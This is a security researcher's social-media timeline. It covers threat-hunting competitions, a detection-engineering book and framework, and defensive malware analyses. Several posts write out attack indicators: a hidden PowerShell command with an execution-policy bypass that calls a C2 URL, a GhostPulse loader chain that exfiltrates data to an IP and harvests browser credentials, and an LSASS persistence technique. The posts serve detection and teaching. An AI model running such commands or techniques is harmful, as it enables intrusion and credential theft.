Security research/detection, also writing for detect.fyi/. Base64 Enjoyer. Clippy is a threat actor. BSKY bsky.app/profile/koifsec.bsk…

Pinned Tweet
I wrote a book! A Dance of Red and Blue - the epistemology, game theory, and craft behind detection engineering. Giving away copies. Reply with your best cybersec joke or meme and I'll pick some folks to send it to. koifsec.medium.com/my-book-a… amazon.com/dp/B0GT1LQHF6
1
1
131
🏆 What a finish to our September competition! Participants tackled a real case simulating an Iranian APT campaign, tracing the attack through the evidence. The leaderboard stayed close throughout. 🔎 Congratulations to the top three: 🥇 Bombolone (Carlo Luciani) - Prize: "Investigating Windows Endpoints" course courtesy of @13CubedDFIR 🙏 🥈 @KoifSec - Prize: x2 months of Threat Hunting Labs access 🥉 aboelrous (Omar A.) - Prize: x1 month of Threat Hunting Labs access Thanks to everyone who took part and made it such a great event! 🔥 The lab that was used in this competition is available for our labs subscribers with a full report. Each question has a walkthrough video courtesy of Andrew from Empirical Training. Go check out his YouTube channel piped.video/@andrewcyberjone… Check out 13Cubed Training courses: training.13cubed.com/ Lab: threathuntinglabs.com/threat…
1
6
10
2,561
KoifSec retweeted
Some thoughts about building and learning in our our AI era: AI has made building things ridiculously easy. You can build a website in minutes, connect a few APIs, add an AI layer, and have a product for sale before the end of the day. But building the thing and understanding the problem are still very different skills. Here are some good infosec examples this applies to: 1. You can build an alerting product. Do you understand alert fatigue well enough to know which alerts deserve attention and what context an analyst actually needs? 2. You can build a threat intel platform collecting millions of IOCs. Do you understand what makes intelligence actionable for a SOC, threat hunter, or IR team? 3. You can build an “AI SOC analyst” (I hate this 😅) that summarizes logs and take action. Do you understand how investigations actually develop, what evidence matters, what analysts ask next, and where telemetry can mislead you? 4. You can build an EDR dashboard around process, file, and network events. Do you understand endpoint telemetry well enough to know which events matter and how they fit together during an intrusion? 5. You can build a cybersecurity training platform and generate labs, questions, and explanations with AI. Do you understand what people actually need to learn to do the job and how to create realistic problems that develop those skills? AI made building easier. It did not make understanding easier. The barrier to building a product is disappearing. The barrier to building the right product is not! Keep learning the craft, will help you build more effectively after you understand the problem.
4
6
45
6,436
Published a new post today: "Deep-diving Crowdstrike's DirectoryCreate" - if you are interested about the inner-works of how folder creation works on Crowdstrike's telemetry, give it a read. detect.fyi/deep-diving-crowd…
1
7
220
𝗧𝗵𝗲 𝗧𝗵𝗿𝗲𝗮𝘁 𝗛𝘂𝗻𝘁𝗶𝗻𝗴 𝗟𝗲𝗮𝗴𝘂𝗲 𝗶𝘀 𝗰𝗼𝗺𝗶𝗻𝗴 We’re launching the Threat Hunting League, a recurring competition series for threat hunters, detection engineers, incident responders, and SOC analysts. Each round is built around realistic intrusion activity. Participants investigate evidence, submit findings, earn points, climb the leaderboard, and compete across the wider season. First 3 winners will receive prizes! For this first competition that we'll be announcing soon, the first-place winner will receive a course giveaway from a leading security training provider! We’ll announce the first event soon, including the scenario, registration window, prize details, and scoring format. Learn more about The Threat Hunting League and upcoming competitions: threathuntinglabs.com/compet…
3
13
2,472
Published a new article that examines WSL for payload staging, check it out > detect.fyi/the-interesting-c…
2
56
KoifSec retweeted
Komari just landed in LOLRMM and this one's different. Komari doesn't need to be abused to function as a C2. The control channel ships enabled by default. You point it at a server you control and type an install command. That's it. @HuntressLabs caught it being dropped as a SYSTEM-level backdoor, disguised as "Windows Update Service", pulled straight from GitHub. The line between "self-hosted monitoring" and "self-hosted C2" doesn't exist here. That's exactly why it belongs in the catalog. Thanks @KoifSec for the contribution. 🫡 🔗 lolrmm.io/tools/komari 🧩 github.com/magicsword-io/LOL… 📖 huntress.com/blog/komari-c2-…
6
11
1,399
Found a TP today from the Axios incident. The observed command was: C:\ProgramData\wt.exe -w hidden -ep bypass -file C:\Users\xxx\AppData\Local\Temp\6202033.ps1 http://sfrclak.[com]:8000 wt.exe running from unusual directories. Thanks to @HuntressLabs for their research on this.
285
KoifSec retweeted
Today I’m launching Threat Hunting Labs. Over the years I’ve analyzed many real-world intrusions. One thing became obvious: most training platforms don’t resemble how investigations actually happen. So I built something different. Threat Hunting Labs focuses on investigation-driven learning using real telemetry and structured investigative paths. If you want to get better at investigating breaches, you should practice investigating breaches. More details here: threathuntinglabs.com/blog/i…
21
115
575
47,515
If you're dealing with code packages or supply-chain risks, just open-sourced one of my tools - deps.sh - completely usable from the CLI as well. Enjoy!
44
KoifSec retweeted
LSASS DLL loading can be abused to establish persistence inside a highly privileged system process. This registry modification alters the Notification Packages value under the LSA key, causing LSASS to load additional packages at startup. Any unexpected LSA Notification Packages entry should be treated as suspicious. hackers-arise.com/advanced-w… @three_cube @_aircorridor @DI0256 #redteam #DFIR #blueteam #pentest
1
19
120
8,210
We invited the first 150 users who signed up for early access. All invitees receive free credits to go through the investigations we currently have in beta. Great feedback so far!🙏 We will invite the second wave early next week! Thank you to everyone who is providing feedback!
2
2
11
1,469
Introducing the "Adversarial Detection Engineering (ADE) Framework" ! Developed by myself and Nikolas Bielski, ADE aims to be for detection rules what MITRE is for attack techniques and CWE is for code. github.com/NikolasBielski/Ad… adeframework.org/
9
31
1,596
KoifSec retweeted
I came across a GhostPulse/HijackLoader intrusion via ClickFix with some interesting evasion techniques. Starts with a PowerShell cradle (178.17.59\.26:5506) deploying an MSI dropper. The GhostPulse loader (81f9a196...) has 0 detections on VT despite being a known binary — still figuring out how it was weaponized: virustotal.com/gui/file/81f9… PlaneV128.exe registers a keylogger (RegisterRawInputDevices), injects into Chrome/Edge via SetThreadContext, and launches browsers in headless mode for credential harvesting. Hardware breakpoints set for anti-debugging. PlaneV128.exe dropped sup.msi (164MB) which extracted the superintendent application during its update routine. 172MB exfil to 84.21.173.142:80 over ~18 min. Persistence via Run key (HyperPackQuickCoreator → C:\Users\<user>\AppData\Local\MegaMaxion\superintendent.exe). The superintendent.exe binary appears to be legitimate software, currently investigating for possible DLL side-loading… explorer.exe └─ powershell.exe -nop -w hidden └─ msiexec.exe s1161271080.msi └─ S_Circuitr.exe └─ PlaneV128.exe (GhostPulse) ├─ chrome.exe --headless ├─ msedge.exe --headless └─ msiexec.exe sup.msi └─ superintendent.exe Signed executables using ZONER/Crisp IM certificates observed throughout the chain. Links: • joesandbox.com/analysis/1862… • tria.ge/260205-ce1n5sdv3g • bazaar.abuse.ch/sample/d63f3… Hunt for PowerShell cradles paired with --headless browser launches. What's particularly interesting: Multiple components have zero detection. If you've seen similar intrusions or have insights on superintendent.exe/this chain, please comment below or reach out. cc @malwrhunterteam
1
27
109
11,985